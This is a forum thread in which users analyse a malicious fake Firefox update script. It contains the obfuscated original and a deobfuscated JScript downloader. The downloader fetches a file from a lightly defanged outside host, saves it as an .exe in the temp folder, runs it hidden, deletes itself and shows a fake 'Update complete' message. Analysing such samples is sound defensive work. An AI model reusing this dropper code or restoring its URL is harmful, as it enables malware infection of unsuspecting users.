Author

Topic: Can somebody decypher this? (Read 504 times)

Das
sr. member
Activity: 308
Merit: 250
August 11, 2016, 10:12:41 AM
#3
Does that mean someone is trying to hack into people's computers by asking them to download free browsers?

Wow, there is a real need for caution nowadays.
hero member
Activity: 955
Merit: 500
August 10, 2016, 10:25:29 PM
#2
In case anybody is interested, I posted it on another site and somebody cracked it.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/

The decyphered script, with XXXXX added from the above gibberish is

Quote
try {
    a = new ActiveXObject("Wscript.Shell");
    b = new ActiveXObject("Scripting.FileSystemObject");
    c = new ActiveXObject("MSXML2.XMLHTTP");
    d = new ActiveXObject("ADODB.Stream");
    url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
    fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
    for (var i = 1; i <= 5; i++) {
        try {
            c.open("GET", url, false);
            c.send(null);
            break;
        } catch (e) {
            WScript.Sleep(5000);
        }
    }
    d.Open;
    d.Type = 1;
    d.Write(c.ResponseBody);
    d.Position = 0;
    if (b.Fileexists(fname)) b.DeleteFile(fname);
    d.SaveToFile(fname);
    a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
    var p = WScript.ScriptFullName;
    if (b.FileExists(p)) b.DeleteFile(p);
    WScript.Echo("Update complete.");
} catch (e) {}
hero member
Activity: 955
Merit: 500
August 09, 2016, 09:52:54 PM
#1
There are a lot of fake browser update sites. Usually I download the scrypt and go to the url and forward the malicious stuff to virustotal to see how long various antivirus sites take to detect it. This scrypt though is written in gibberish that doesn't seem to have a url.

All the ZZZZZs are added to break links

It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink

The script is as follows, can you decypher it? Warning it has something malicious that no antivirus detects yet.

The symbol [ is replaced by ZZZZZ

var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m
Right now it scores 0/54 on virustotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/

In a few days it will score 5 or 10 / 54

In a week or two 20 or 30 / 54
Jump to: